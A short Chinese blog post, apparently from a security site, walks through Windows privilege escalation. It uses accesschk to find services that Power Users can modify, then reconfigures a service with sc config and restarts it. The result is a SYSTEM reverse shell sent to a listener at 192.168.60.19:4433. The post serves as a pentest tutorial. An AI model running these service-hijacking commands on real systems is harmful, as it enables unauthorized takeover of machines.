Windows低权限提权

07.3W+0

用户test隶属于Power User组,  登入系统,IP为192.168.60.23,监听服务IP地址为192.168.60.19

用到的工具:工具:accesschk

Windows低权限提权


执行accesschk.exe -uwcqv “Power Users” * 获取可以操作的服务名称信息;  sc qc kdc查询kdc服务详细信息

Windows低权限提权

查看系统启动的服务

Windows低权限提权

修改参数binpath的值

Windows低权限提权

执行sc config DcomLaunch obj= “.LocalSystem” password= “Windows低权限提权”在重新启动DcomLaunch,在192.168.60.19监听的4433端口成功获取反弹,系统权限

Windows低权限提权

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
渗透测试
# 黑客技术# 渗透测试# Windows# 低权限提权
喜欢就支持一下吧
点赞0 分享
congtou的头像-华盟网
S时评:奥巴马时代的网络安全-华盟网
S时评:奥巴马时代的网络安全
S时评:奥巴马时代的网络安全
10年前 188W+
华盟学院山东省第二期线下学习计划-华盟网
华盟学院山东省第二期线下学习计划
华盟学院山东省第二期线下学习计划
8年前 85.8W+
我混IT这么久,什么“山寨货”没见过?-华盟网
我混IT这么久,什么“山寨货”没见过?
我混IT这么久,什么“山寨货”没见过?
8年前 83.9W+
停课不停学| 华盟学院&重生信安高阶特训营为你保驾护航-华盟网
停课不停学| 华盟学院&重生信安高阶特训营为你保驾护航
停课不停学| 华盟学院&重生信安高阶特训营为你保驾护航
6年前 49.4W+
BlackHat 2018 | 10大网络安全热点趋势-华盟网
BlackHat 2018 | 10大网络安全热点趋势
BlackHat 2018 | 10大网络安全热点趋势
8年前 49.2W+
万达电商亚洲首个超级账本“黑客马拉松”在沪开赛-华盟网
万达电商亚洲首个超级账本“黑客马拉松”在沪开赛
万达电商亚洲首个超级账本“黑客马拉松”在沪开赛
9年前 40.3W+
相关推荐
获取Windows明文密码的小技巧-华盟网
获取Windows明文密码的小技巧
获取Windows明文密码的小技巧
5年前 26.3W+
一个免杀钓鱼思路分享-华盟网
一个免杀钓鱼思路分享
一个免杀钓鱼思路分享
6年前 22.6W+
实战 | 记一次较为详细的代码审计过程-华盟网
实战 | 记一次较为详细的代码审计过程
实战 | 记一次较为详细的代码审计过程
4年前 17.1W+
实战 | 记一次较为详细的代码审计过程-华盟网
实战 | 记一次较为详细的代码审计过程
实战 | 记一次较为详细的代码审计过程
4年前 15.9W+
【渗透测试】看怎么搞定黄网!-华盟网
【渗透测试】看怎么搞定黄网!
【渗透测试】看怎么搞定黄网!
10年前 15.9W+
使用LUKS加密分区-华盟网
使用LUKS加密分区
使用LUKS加密分区
8年前 15.5W+
评论 抢沙发

请登录后发表评论

    暂无评论内容

test1111

分类